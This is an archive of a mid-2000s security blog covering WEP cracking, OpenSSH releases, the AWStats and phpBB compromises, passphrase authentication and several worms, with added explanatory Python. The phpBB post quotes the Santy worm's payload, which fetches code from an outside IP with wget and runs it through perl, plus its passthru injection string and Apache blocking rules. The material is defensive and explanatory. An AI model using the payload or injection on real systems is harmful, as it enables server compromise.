Wednesday, April 6, 2005

WEP is even easier to crack than we thought

A proof of concept demonstration by the FBI, using tools available in the public domain, showed that it is possible to break the protection provided by WEP in three minutes. Previously it took considerably longer because so many packets had to be captured before a full analysis could be run on them. The newer tools use statistical techniques that focus on the 24-bit initialisation vectors (IVs), which WEP sends in the clear with every frame, so far fewer captured packets are needed before a final key-recovery step completes the attack in such a short period of time.

Considering that a lot of wireless access points are not even using WEP, one might think that it's not too much of a problem as most are wide open anyway. Although totally true, it's just as bad having no security as thinking you are safe when really you're not. In fact, it could pose more of a problem when a false sense of security is in place. For example, if someone knew their network was wide open they would be less likely to store sensitive information on it. That's not always the case, but it would be most of the time.

If they thought their network was secure and locked down, they'd impose fewer restrictions on storing sensitive information, so having a false sense of security is asking for trouble. Security through obscurity doesn't always work, but it can help. Although it should not be the only line of defence, in regards to wireless there are some easy things you can do.

Using certain tools, you can create thousands of fake access points, which protects your real one to a certain degree. Using this approach along with WPA instead of WEP greatly reduces the chances of your network being penetrated via a wireless access point. There are firmware upgrades for most wireless devices now which will allow you to use WPA instead of WEP. Of course, all of this does not apply if your access point is wide open, and most are; a lot of them are not even rogue!
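The weakness the attack leans on is the size of the IV: 24 bits gives only 16,777,216 keystreams per key, so IVs repeat, and every repeat leaks the XOR of two plaintexts. The following Python is added here as an illustration and is not taken from the tools mentioned above. It implements RC4 and the WEP framing (IV in the clear, RC4 keyed with IV || key), shows plaintext recovery from a reused IV given one known frame, and works out the birthday bound for a collision. The key, IVs and frame contents are constructed sample values; the key-index byte and ICV of a real frame are omitted.

```python
import math
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then the keystream generator XORed over data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP body as sent on the air: the 3-byte IV in the clear, then RC4(IV || key)
    applied to the payload. A real frame also carries a key-index byte and a
    CRC-32 ICV; both are left out because they play no part in keystream reuse."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + rc4(iv + wep_key, payload)


def keystream_reuse(frame1: bytes, frame2: bytes) -> Optional[bytes]:
    """If two frames under the same key carry the same IV they used the same
    keystream, so XORing the ciphertexts cancels it and leaves p1 XOR p2."""
    if frame1[:3] != frame2[:3]:
        return None
    n = min(len(frame1), len(frame2))
    return bytes(a ^ b for a, b in zip(frame1[3:n], frame2[3:n]))


def recover_plaintext(frame1: bytes, frame2: bytes, known_payload1: bytes) -> bytes:
    """Given the plaintext of frame1 (an ARP or DHCP frame is largely predictable),
    (p1 XOR p2) XOR p1 yields frame2's plaintext without ever touching the key."""
    xored = keystream_reuse(frame1, frame2)
    if xored is None:
        raise ValueError("frames do not share an IV")
    return bytes(a ^ b for a, b in zip(xored, known_payload1))


def frames_until_collision(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Birthday bound: frames needed before two randomly chosen IVs repeat with
    the given probability. For 24-bit IVs and p = 0.5 this is under 5,000 frames;
    cards that restart their IV counter at 0 on every reset collide far sooner."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    # Constructed sample values: a 40-bit WEP key, one reused IV, two payloads.
    key = bytes.fromhex("0102030405")
    iv = b"\x00\x00\x01"
    frame1 = wep_encrypt(key, iv, b"known plaintext")
    frame2 = wep_encrypt(key, iv, b"secret payload!")
    print(recover_plaintext(frame1, frame2, b"known plaintext"))
    print(frames_until_collision())
```

Note that none of this recovers the key; that is what the statistical attacks on weak IVs add. Keystream reuse alone is enough to read traffic, which is why a small IV space is fatal regardless of key length.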

Post ID: 719, posted by jase at 01:58 PM

Friday, April 1, 2005

RFID chip on passports

I don't think the idea of putting RFID chips in passports is a good idea, especially since they are not going to contain any encryption. We all know that most systems are usually cracked in no time at all, so why increase the risk of people having information stolen from them without their knowledge, by using an up and coming technology for a purpose that it is not really designed for?

With changes made to the current plans, it could work. But there is no real need for RFID to be used. There are advantages, but I don't think they measure up when compared to the potential security risks associated with transmitting personal data via a wireless system that contains no real security.

There are plenty of other alternatives that could be used to increase productivity when checking passports or other identification without increasing the risk of this information being available to anyone with freely available equipment. There are enough cases of identity theft taking place; there's no reason to increase the number.

Visit RFID Kills to post your comments about the topic of including RFID chips in all new American passports. Of course, once one country does it the race will be on for all the sheep to follow, which in this case certainly wouldn't be a good thing unless security is improved. Also check out the comments on Slashdot.

Post ID: 713, posted by jase at 11:38 AM

Wednesday, March 9, 2005

OpenSSH 4.0 released

OpenSSH 4.0 and the portable version 4.0p1 have been released today.

Here are the changes since 3.9 as reported in the announcement email. I've edited and formatted them, as when copied from the email they don't display very well.

--

* ssh(1) now allows the optional specification of an address to bind to in port forwarding connections (local, remote and dynamic). Please refer to the documentation for the -L and -R options in the ssh(1) manual page and the LocalForward and RemoteForward options in the ssh_config(5) manpage. (Bugzilla #413)

* To control remote bindings while retaining backwards compatibility, sshd(8)'s GatewayPorts option has been extended. To allow client-specified bind addresses for remote (-R) port forwardings, the server must be configured with "GatewayPorts clientspecified".

* ssh(1) and ssh-keyscan(1) now support hashing of host names and addresses added to known_hosts files, controlled by the ssh(1) HashKnownHosts configuration directive. This option improves user privacy by hiding which hosts have been visited. At present this option is off by default, but may be turned on once it receives sufficient testing to confirm stability.

* Added options for managing keys in known_hosts files to ssh-keygen(1), including the ability to search for hosts by name, delete hosts by name and convert a known_hosts file over to one with hashed names. These are particularly useful for managing known_hosts files with hashed names that are stored in the file.

* Improve account and password expiry support in sshd(8). The server will now warn in advance, for both account and password expiry.

* sshd(8) will now log the source of connections denied by AllowUsers, DenyUsers, AllowGroups and DenyGroups.
See Bugzilla #909.

* Added the AddressFamily option to sshd(8) to allow global control over IPv4/IPv6 usage. See Bugzilla #989.

* Improved sftp(1) client, including fixes for the ``ls'' command and command history and editing support using libedit.

* Improved the handling of bad data in authorized_keys files, eliminating fatal errors on corrupt or very large keys.
See Bugzilla #884.

* Improved connection multiplexing support in ssh(1). Several bugs have been fixed and a new "command mode" has been added to allow the control of a running multiplexing master connection, including checking that it is up, determining its PID and asking it to exit.

* Have scp(1) and sftp(1) wait for the spawned ssh to exit before they exit themselves. This prevents ssh from being unable to restore terminal modes (not normally a problem on OpenBSD but common with OpenSSH portable on POSIX platforms).
See Bugzilla #950.

* Portable OpenSSH:

- Add *EXPERIMENTAL* BSM audit support for Solaris systems
See Bugzilla #125.

- Enable IPv6 on AIX where possible (see README.platform for details), working around a misfeature of AIX's getnameinfo.
See Bugzilla #835.

- Teach sshd(8) to write failed login records to btmp for unsuccessful login attempts. Currently this is only for password, keyboard-interactive and challenge/response authentication methods and only on Linux and HP-UX.

- sshd(8) now sends output from failing PAM session modules to the user before exiting, similar to the way /etc/nologin is handled.

- Store credentials from gssapi-with-mic authentication early enough to be available to PAM session modules when privsep=yes.

--

There are lots of changes and improvements, so it is worth upgrading the OpenSSH server running on your systems, if you use OpenSSH of course.
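The HashKnownHosts format mentioned in the announcement is simple enough to reproduce, which makes it easier to see what it does and does not hide. The Python below is an added example rather than OpenSSH's own code: a hashed host field is `|1|<base64 salt>|<base64 HMAC-SHA1(salt, hostname)>` with a 20-byte random salt, so each entry can still be checked against a name you already know, but the file no longer lists where you have been. The two helpers mirror what `ssh-keygen -H` and `ssh-keygen -F` do for plain entries; the known_hosts content and key blobs are constructed, and the `@marker` and `[host]:port` forms are not handled.

```python
import base64
import hashlib
import hmac
import os
from typing import List, Optional

HASH_MAGIC = "|1|"   # marks a hashed host field in known_hosts
SALT_LEN = 20        # bytes: the HMAC-SHA1 digest length


def hash_hostname(host: str, salt: Optional[bytes] = None) -> str:
    """Produce the |1|<salt>|<HMAC-SHA1(salt, host)> form used by HashKnownHosts."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    digest = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return HASH_MAGIC + base64.b64encode(salt).decode() + "|" + base64.b64encode(digest).decode()


def host_field_matches(field: str, host: str) -> bool:
    """True if a known_hosts host field (hashed or plain) refers to `host`.
    The hash is one-way, so the only question a reader can ask is 'is it this name?'"""
    if not field.startswith(HASH_MAGIC):
        return host in field.split(",")   # plain entries list names/addresses with commas
    _, _, salt_b64, digest_b64 = field.split("|")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(actual, expected)


def hash_known_hosts(text: str) -> str:
    """What ssh-keygen -H does: one hashed line per host name, keys unchanged.
    Comment lines and already-hashed lines pass through untouched."""
    out = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith(HASH_MAGIC):
            out.append(line)
            continue
        hosts, key = stripped.split(None, 1)
        for h in hosts.split(","):          # a,b,c becomes three separate hashed lines
            out.append(f"{hash_hostname(h)} {key}")
    return "\n".join(out) + "\n"


def find_host(text: str, host: str) -> List[str]:
    """What ssh-keygen -F does: return the lines whose host field matches."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if host_field_matches(stripped.split(None, 1)[0], host):
            hits.append(line)
    return hits


# Constructed sample; the key blobs are placeholders, not real public keys.
SAMPLE_KNOWN_HOSTS = (
    "# constructed for the example\n"
    "git.example.com,192.0.2.10 ssh-rsa AAAAB3NzaC1yc2EAAAAexamplekeyblob==\n"
    "bastion.example.net ssh-rsa AAAAB3NzaC1yc2EAAAAanotherkeyblob==\n"
)

if __name__ == "__main__":
    hashed = hash_known_hosts(SAMPLE_KNOWN_HOSTS)
    print(hashed)
    print(find_host(hashed, "192.0.2.10"))
```

The caveat worth keeping in mind is that hashing protects against a casual reader of the file, not against someone who can guess names: an attacker with a list of candidate hosts can test each one against every salt, exactly as `find_host` does.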

Post ID: 687, posted by jase at 04:01 PM

Tuesday, February 8, 2005

phpBB site compromised

Due to the recently identified issue with AWStats, the phpBB site has been defaced. They were using the update-from-web option, like all of the other systems hit that had AWStats with this option enabled. I can't see why people use this option anyway, since I use a cron entry to run mine automatically.

Unless you really need to give people access to your stats, using a .htaccess file to block public access means that, even with the update-from-web option enabled, nobody outside the allowed addresses would have been able to exploit the vulnerability.

Luckily most of the people that had problems had backups of their data, but it has still cost them a lot of time. In light of the recent issues with phpBB and the worms that were developed to exploit bugs within it, combined with the fact that the actual phpBB site was defaced via a security issue with AWStats that was three weeks old, it makes one ask the question: does the phpBB team need to get their act together with regards to security?

See the story on Netcraft.

Post ID: 658, posted by jase at 11:43 PM

Tuesday, February 1, 2005

AWstats vulnerability

A number of people, including Jeremy Zawodny and Russell Beattie, have been hit by this security issue, which affects versions 5.0 to 6.2. If you have the option AllowToUpdateStatsFromBrowser set to 0 then you are not affected. To be honest, there is no reason to use that feature. I don't; my stats update runs hourly from cron, which is the most logical thing to do, since then no intervention is required to obtain the latest stats information. All you need to do is view the URL.

Unless you want to allow people to view your stats, using a .htaccess would be wise; it would have eliminated this issue for Russell and Jeremy even with the update-from-browser option on. The need-to-know basis is part of the foundation of security, computer and otherwise: don't give information to people that don't require it.

Thursday, January 6, 2005

Gmail delivery issues

If you have a Gmail account and your address includes a special character, you might find that some of the mail being delivered to you is actually meant for another Gmail account that is the same as yours but without the special character, it has been reported.

An address of abc.def@gmail.com could receive mail that is meant for abcdef@gmail.com with no user intervention required. Google appears to have implemented a partial fix already, at least to stop new accounts being created with special characters. I'm unable to currently confirm if the real flaw has been addressed yet.

Thursday, December 30, 2004

TypeKey authentication enabled

I've now enabled TypeKey authentication as part of the Movable Type upgrade. Now only TypeKey-authenticated user comments will skip moderation, and once I've sorted out MT-Blacklist so that it works again since the upgrade, only comments that pass the blacklist rules will enter the moderation queue.

I've set things up so that anyone who is authenticated via TypeKey will be able to post freely as long as the blacklist rules are passed. These updates should see the end of any spam ever making it to the live pages; any that comes via TypeKey accounts can easily be removed and the account used can be banned.

Since upgrading, I noticed a few things were not working, but I've sorted them out now. Those issues were mainly interface related and were caused by me putting a few files in the wrong places when doing the upgrade, which I put down to the fact that it was 6am and I needed to sleep.

Apart from the blacklist issues, everything appears to be fine. I've sorted some of the problems with it, but the remaining errors are not very informative about what is wrong, so I'll have to work on that.

Other than that, all that remains is to work on some other changes and additions which should come shortly, such as the odd few things that I want to add that have been appearing on other blogs as well as some other changes.

As the blog world moves forward and evolves we're finding more added to make them more viewable and fun, that is if you can use that word in relation to a blog.

Ben has also been busy working on his blog, cleaning up the spam and making the transition to WordPress, which should be noticed soon. Keep an eye on that as there should be some interesting things coming up, even though he's taken ages to get things sorted.

I've also added an Atom feed that you might want to use.

Tuesday, December 21, 2004

phpBB critical security issue

There is currently a worm spreading around the Internet that is searching for phpBB-based message boards that are vulnerable. All previous versions are affected unless patched, except for the latest release. There may well be some manual exploitation taking place, but mainly this issue is being exploited by a worm called Santy.A; it's also known by a few other names.

I have heard of quite a few boards that have had content modified, and because of the payload of this worm it has also been modifying HTML documents and images, to name a few. Exploiting the issue allows the worm to write a Perl script to a file on the server and then run it, which applies the rest of the payload and also starts the worm scanning for other vulnerable phpBB boards to compromise.

Aside from applying a patch or upgrading, there are a few other things that can be done, which some people have implemented, that could stop any attack by the worm before boards are updated. This is handy if you run a server with a lot of sites running older versions of phpBB.

Creating a rewrite rule such as the following should help to provide a quick fix.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]

Or if you use mod_security in Apache you could use the following:

SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("

Some work has already been done to decode the payload, which has been reported as:

rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'

Modifying the following code in the file viewtopic.php will resolve the issue, if you don't want to upgrade. The only change is to drop the extra urldecode() call: PHP has already decoded the query string once, and decoding it a second time is what lets a double-encoded quote slip past htmlspecialchars().

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

for($i = 0; $i < sizeof($words); $i++)
{

Replace with:

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

for($i = 0; $i < sizeof($words); $i++)
{
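Why dropping the urldecode() is enough can be seen by modelling the two code paths in Python. This is an added illustration, not phpBB code: it mimics PHP's single URL decode of the query string, the addslashes() that magic_quotes_gpc (or phpBB's own common.php, when that setting is off) applies to every GET value, and htmlspecialchars() with its default flags, which escape the double quote but not the single one. The request values are constructed from the decoded payload quoted above.

```python
import re
from urllib.parse import unquote


def addslashes(s: str) -> str:
    """PHP addslashes(): what magic_quotes_gpc (or phpBB's common.php when it is
    off) applies to every GET value, so a raw quote arrives with a backslash in front."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def htmlspecialchars(s: str) -> str:
    """PHP htmlspecialchars() with the default ENT_COMPAT flags: & < > and the
    double quote are escaped, the single quote is left alone."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def http_get_var(raw_query_value: str) -> str:
    """The value phpBB sees in $HTTP_GET_VARS: the server URL-decodes the query
    string once, then slashes are added."""
    return addslashes(unquote(raw_query_value))


def highlight_words_vulnerable(raw_query_value: str) -> list:
    """phpBB 2.0.10: urldecode() a second time, then htmlspecialchars()."""
    value = http_get_var(raw_query_value)
    return htmlspecialchars(unquote(value)).strip().split(" ")


def highlight_words_fixed(raw_query_value: str) -> list:
    """The patched line: no second urldecode()."""
    value = http_get_var(raw_query_value)
    return htmlspecialchars(value).strip().split(" ")


UNESCAPED_QUOTE = re.compile(r"(?<!\\)'")


def can_break_out(words: list) -> bool:
    """An unescaped single quote in a highlight word terminates the quoted
    string that viewtopic.php later embeds in an eval'd preg_replace() pattern."""
    return any(UNESCAPED_QUOTE.search(w) for w in words)


# Constructed inputs: the Santy request shape with one extra level of encoding
# (%2527 -> %27 -> '), and the same thing encoded only once.
DOUBLE_ENCODED = "%2527.passthru($HTTP_GET_VARS[rush]).%2527"
SINGLE_ENCODED = "%27.passthru($HTTP_GET_VARS[rush]).%27"

if __name__ == "__main__":
    for label, raw in (("double", DOUBLE_ENCODED), ("single", SINGLE_ENCODED)):
        print(label, "vulnerable:", can_break_out(highlight_words_vulnerable(raw)),
              "fixed:", can_break_out(highlight_words_fixed(raw)))
```

The single-encoded request fails in both versions because the quote arrives already backslashed; only the double-encoded one reaches the second urldecode() as a harmless `%27` and comes out the other side as a bare quote. Removing that decode closes the gap without touching the rest of the function.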

A lot of sites have already been defaced, which is another good reason to have a recent backup copy in addition to keeping up to date on security issues and applying appropriate patches.

Thursday, October 21, 2004

Password or phrase?

Robert Hensing from the Microsoft PSS Security Team is proposing a new method of accessing systems. Although using a passphrase instead of a password is nothing new, it is when we are talking about general access control systems. At present a user can authenticate using a username and password. In some cases you'll need a token as well, if the system is using something like SecurID, but for the most part it's username and password authentication only.

Robert, along with others, thinks that it is time to change and improve upon the current system. It's rather like when the password file was readable by all users on a system: one day it was decided that this was a bad idea and along came the shadow password file. Allowing users to use phrases instead of just a simple one-word password would increase security and stop accounts being compromised so easily, as users would not be able to use simple dictionary words, which helps to prevent dictionary-based attacks.

Various people within Microsoft are looking at this phrase method of authentication; Jesper M. Johansson has written a document about it which outlines some of the reasons why this change should be made. There are some interesting points made. With the rise of worms that include password crackers and dictionaries, the amount of automated cracking taking place is also increasing.

Ensuring that AV software is constantly updated, and using rules to prevent certain words being used in passwords or adopting passphrase authentication, will help mitigate the effect that these worms have. The problem is that most people in the world who are not that computer literate have problems remembering passwords as it is. Although using tokens would be better, there are increased costs and some companies cannot afford to pay. Combined with the fact that most people would have problems using tokens, the passphrase approach would increase authentication security without the cost and complexity issues.

If more companies were aware of the need for better security, the people who have the authority to spend money might do so. At the moment, a lot of companies are not aware. With the introduction of phrase authentication instead of passwords in Windows, it would allow for some degree of increased security without any extra money being spent.

Users would rather not have to type longer passwords or phrases, but if they are forced to then of course they will. So it is the job of the security team and the administrators of a network to ensure that a decent policy is used. Windows has supported long passwords since Windows 2000, so using a phrase is not a problem.

I have already thought about this, but reading these articles also reminds me that it is not the complexity of a password or phrase alone that makes it more secure; it is the length. A shorter password has to be made more complex to compensate, whereas a longer phrase of text increases the search space by itself: the longer a password or phrase is, the more possible combinations there are, which of course increases the time required to crack it.

Using a long phrase of around 40 characters, for example, would take a very long time to crack. It simply would not be worth it, and by the time an attack might have hit the jackpot, the password change policy would have ensured that the password had already been changed, so the attacker would be back to square one.

For those of us that can type really fast, using a phrase would not be too much of an issue. People that type slowly would have to spend a little more time logging in. I'm sure that most administrators with half a clue about security would consider this side effect acceptable when judged against the increased security provided.

It's not only Microsoft products that should adopt this approach; it would allow for even more security on other operating systems. In the same way, if the password file were obtained, it would not be feasible to try and crack the passwords if a good change and complexity policy were used. Maybe Microsoft should ensure that a longer minimum length is enabled by default to help the use of longer phrases spread.

Policies have been available on various systems for a long time, but they have not been used very often, or only in limited form, such as not being allowed to reuse a previous password. Complexity rules are not used as much on Windows systems, and most UNIX-based systems I've used don't implement any complexity requirements at all, or you get warned about complexity but can ignore it and use the password you want anyway.

This could be the start of a change like we saw when people stopped using authentication systems that sent credentials in clear text. Soon we could have the same thoughts about using passwords as we now do about plain-text authentication.
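The point about length versus complexity can be made concrete. The Python below is an added example, not from the Microsoft documents mentioned, of the two policy pieces the post describes: rejecting dictionary words, including ones dressed up with substitutions, while letting long phrases through, and estimating the brute-force search space to show why a 28-character phrase of plain words beats an 11-character "complex" password. The wordlist, substitution table and guess rate are constructed assumptions.

```python
import math
import re

# Constructed mini wordlist; a real policy check would load a full dictionary
# such as the ones shipped with password crackers.
DICTIONARY = {"password", "welcome", "letmein", "monkey", "dragon", "secret", "qwerty"}

# Substitutions people use to dress a dictionary word up as "complex" (assumed table).
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "l", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})


def normalise(candidate: str) -> str:
    """Lower-case, drop a trailing run of digits, then undo leet substitutions,
    so P@ssw0rd1 is judged as the word 'password'."""
    return re.sub(r"\d+$", "", candidate.lower()).translate(LEET)


def charset_size(candidate: str) -> int:
    """Size of the alphabet a brute-force attacker has to assume."""
    size = 0
    if re.search(r"[a-z]", candidate):
        size += 26
    if re.search(r"[A-Z]", candidate):
        size += 26
    if re.search(r"[0-9]", candidate):
        size += 10
    if re.search(r"[^A-Za-z0-9]", candidate):
        size += 33          # printable ASCII punctuation and space
    return size


def brute_force_bits(candidate: str) -> float:
    """log2 of the search space: length multiplies the exponent, a richer
    alphabet only adds a couple of bits per character."""
    return len(candidate) * math.log2(charset_size(candidate))


def years_to_exhaust_half(bits: float, guesses_per_second: float = 1e9) -> float:
    """Expected time to reach the right guess (half the space) at an assumed rate."""
    return 2 ** (bits - 1) / guesses_per_second / (365 * 24 * 3600)


def check_policy(candidate: str, min_length: int = 8, passphrase_length: int = 20) -> tuple:
    """Returns (accepted, reason). Anything of passphrase length passes on length
    alone; shorter secrets must not be a disguised dictionary word and must use
    more than one character class."""
    if len(candidate) < min_length:
        return False, "shorter than %d characters" % min_length
    if len(candidate) >= passphrase_length:
        return True, "passphrase"
    if normalise(candidate) in DICTIONARY:
        return False, "dictionary word in disguise"
    if charset_size(candidate) <= 26:
        return False, "single character class"
    return True, "password"


if __name__ == "__main__":
    for c in ("P@ssw0rd1", "Tr0ub4dor&3", "correct horse battery staple"):
        ok, why = check_policy(c)
        print(f"{c!r}: {ok} ({why}), {brute_force_bits(c):.0f} bits, "
              f"{years_to_exhaust_half(brute_force_bits(c)):.2e} years at 1e9 guesses/s")
```

The brute-force figures are an upper bound on the attacker's effort; a phrase built from common words is really a search over a dictionary of words rather than characters, which is why the policy still wants phrases to be long rather than merely multi-word.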

Post ID: 542, posted by jase at 07:46 PM

Tuesday, September 28, 2004

The OpenSSH project turns five

Here is the announcement:

--

Five years ago, in late September 1999, the OpenSSH project was started.

It began with an audit, cleanup and update of the last free version of Tatu Ylonen's legacy ssh-1.2.12 code. The project quickly gathered pace, attracting a portability effort and, in early 2000, an independent implementation of version 2 of the SSH protocol. Since then, OpenSSH has led in the implementation of proactive security techniques such as privilege separation & auto re-execution.

The free software community were rapid adopters of OpenSSH, with most free operating systems shipping OpenSSH within its first year of existence. Over the last five years OpenSSH has become the most widely used SSH protocol implementation (by a large margin) and has been included in products from major vendors including IBM, Apple, HP, Sun, Cisco and NetScreen. Today, OpenSSH runs on everything from mobile phones to Cray supercomputers.

In providing a free, popular and easy to use secure login and command execution protocol OpenSSH has been instrumental in speeding the deprecation of insecure protocols like telnet and rlogin.

The OpenSSH team would like to thank all those who have supported the project over the last five years, including individuals and vendors who have donated funds or hardware. An extra special thanks to those who have reported bugs or sent patches to the project.

OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de Raadt,
Kevin Steves, Damien Miller, Ben Lindstrom, Darren Tucker and Tim Rice.

--

Five years already? That was a bit of a shock. It just goes to show how quickly time goes. I've been using OpenSSH since the start, firstly with OpenBSD and then moving over to using it on Linux. A lot has been done with it, hopefully there is more to come. Well done to all those concerned.

Post ID: 519, posted by jase at 11:29 PM

Friday, July 30, 2004

DEFCON 12

Today is the start of DEFCON 12 in Las Vegas. I've been saying I will go every year since 1998 and have still not got around to it due to other trips away and such. Next year I'm going to try and make it, the problem is that there are a lot of things on my schedule that I want to do most years and some collide so decisions have to be made.

I'm off to Godskitchen Global Gathering tomorrow, so that is something I would have missed, but would not have minded since I would have been in Las Vegas instead.

DEFCON 13 is already down on the list next year, just need to wait for the date to be confirmed!

Post ID: 458, posted by jase at 02:33 PM

Monday, July 26, 2004

MyDoom.M

So the latest on the block is MyDoom.M, and it seems that this worm spreads very fast. I've already received a few messages at my work account. As we run Solaris, there is no real effect apart from extra load on the mail servers. Some of the global aliases that the worm has been sending itself to have been gathered from infected machines that do run MS OSes, such as laptops, so the worm is able to spread itself to these addresses from inside the SWAN (Sun Wide Area Network) when they are connected internally or via VPN.

Even when you have a network with virtually no infected systems connected, all it takes is one machine to still cause issues. Most global aliases have no need to accept external mail, so that cuts it down, but when you have infected systems that connect, issues still arise; in this case mostly just increased mail activity, but on other networks a worm such as this will have much more of an effect, as just about all machines are probably Windows based. The From field of the email received is spoofed, and when infected a backdoor is installed, known as Backdoor.Zincite.A, listening on port 1034/tcp.

The following registry keys are created:

* HKEY_LOCAL_MACHINE\Software\Daemon
* HKEY_CURRENT_USER\Software\Daemon

And it copies itself to the system as:

* %Windir%\java.exe
* %Windir%\services.exe


The following values are added to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

"Services" = "%Windir%\services.exe"
"JavaVM" = "%Windir%\java.exe"

So the worm is loaded when Windows boots. It is being reported that this is classed as quite severe due to the rate at which it appears to be spreading. For a full analysis go here. You would be advised to update your AV software.

Post ID: 454, posted by jase at 12:38 PM

Monday, July 19, 2004

Duts.1520

Word on the street is that Ratter, a member of the 29A virus development group, has released a proof of concept virus designed for the PocketPC. It was only recently that 29A released code which targets mobile phones running the Symbian OS.

There is no destructive payload, and the user is asked whether the virus is allowed to spread, which is partly due to this being POC code. Of course, there may now be a stream of future viruses destined for Symbian devices and also PocketPC systems.

It just goes to show, it is only a matter of time before someone decides to do something and completes the task. Read an analysis of Duts, here.

Monday, July 5, 2004

Beagle.Y & Beagle.Z

Another two variants have been released, Beagle.Y and Beagle.Z. One of these worms includes its source code, which will probably allow a number of new variants to be released at an even higher rate than we have previously seen. One thing though: what will happen to the naming scheme now we have made it to the end of the alphabet?

An interesting thing to note is that both of these worms can stop versions of W32.Netsky from running, which is obviously part of the game the various programmers of these worms are playing.

Post ID: 433, posted by jase at 09:02 PM

Saturday, June 26, 2004

Download.Ject - Safe to browse?

Well, let's face it: the majority of servers on the Internet are powered by a non-Microsoft OS, but the majority of users browsing the Internet are using Internet Explorer. The reports of some high-traffic sites being hacked and distributing malicious code to visitors are probably going to mean infections for most of the users running IE, but applying the patches from Microsoft and keeping your AV software updated should help reduce the risk of infection.

Since there are a lot fewer sites powered by IIS compared to Apache, the issue is not as bad as it could be, but all it takes is a few servers running IIS and distributing this code to infect all the visitors running IE.

I'm sure the various AV vendors will have updated their signatures now, but it might also be a good idea to use an alternative browser rather than IE. I can't help thinking if we went back to the core of the system - the design - we'd not have these problems.

As most would agree, to stop the constant supply of issues relating to MS products, the entire OS would have to be rebuilt, with more limits in place with regard to access and such, so that exploiting these types of vulnerabilities does not allow complete access to a system.

A system is only as secure as its weakest point and the weak point in this equation is Windows.

Monday, June 21, 2004

Port blocking at ISP level

NTL recently announced that they will be blocking inbound traffic to certain ports on their network, which are used by some of the recent worms. The blocking will not affect most users, but it may cause problems for certain users of services which also use some of those ports, such as Windows file and print sharing.

The ports being blocked at present are:

* 137 (UDP)
* 138 (UDP)
* 139 (TCP)
* 445 (UDP & TCP)
* 593 (TCP)
* 1433 (TCP)
* 1434 (UDP)
* 27374 (TCP)

It seems like a good move. I'm just wondering when other ISPs who provide Internet connectivity to the majority of people (who don't know how to keep their Windows computers secure) will do the same; these same users are the ones who think they know about computers when the reality is they don't even really know Windows products, let alone *NIX or anything else.

Windows needs AV protection built in and on by default - forget the anti-trust issues, include some AV.

Tuesday, June 15, 2004

First Bluetooth based worm

The group 29A has developed a worm which spreads via Bluetooth and infects mobile phones running the Symbian operating system. Although it does not have a dangerous payload, it is proof of concept code, which is something that the 29A group tends to release a lot of.

This worm, called Cabir, won't damage your handset, but future variants or other code may well do. Just think how annoying it would be if you ran something that then wiped your handset or memory card, on the Nokia 6600 for example.

You are given a message asking if you want to run an installer, so this, combined with the fact that you would be receiving the "application" from an unknown source, might stop some people from running it or a variant. Although from what we have seen in the past, there will still be a large number of people who would accept the file and run it.

All very interesting, most POC projects usually are!

Sunday, June 6, 2004

Plexus-A

A new worm is circulating which spreads via multiple means. It uses exploit methods recently seen in other worms, such as Blaster and Sasser.

Plexus copies itself to the system as upu.exe. It then registers this file in the registry under:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvClipRsv"=[path to the executable file]

Plexus opens port 1250, so it would be worth blocking this port at the firewall.

For a full analysis, go here.

Now, I'm thinking that if MS did more to include protection in Windows by default, a lot of these problems could be reduced. For example, if there was an AV scanner included with Windows, at least all systems would have it and users would not need to do anything. Most systems don't have any AV software, and this is partly where the problem lies.

It would not solve the problem totally, but it sure would cut the number of systems getting infected to a much lower figure and at least notify users that something might be up.

Along the lines of OpenBSD's "secure by default", Microsoft could adopt the slogan "AV protected by default".

I'm sure one of the AV vendors out there would like to have their application included by default and get a load of money from MS or Microsoft could just buy the company out, but then we would hear more about world domination and how it is unfair to make such a move, just like we have seen in the past regarding Internet Explorer being bundled with Windows.

Something needs to be done. If most users were not so stupid, things would also improve.

Post ID: 401, posted by jase at 11:40 PM

Friday, June 4, 2004

Covert training is needed

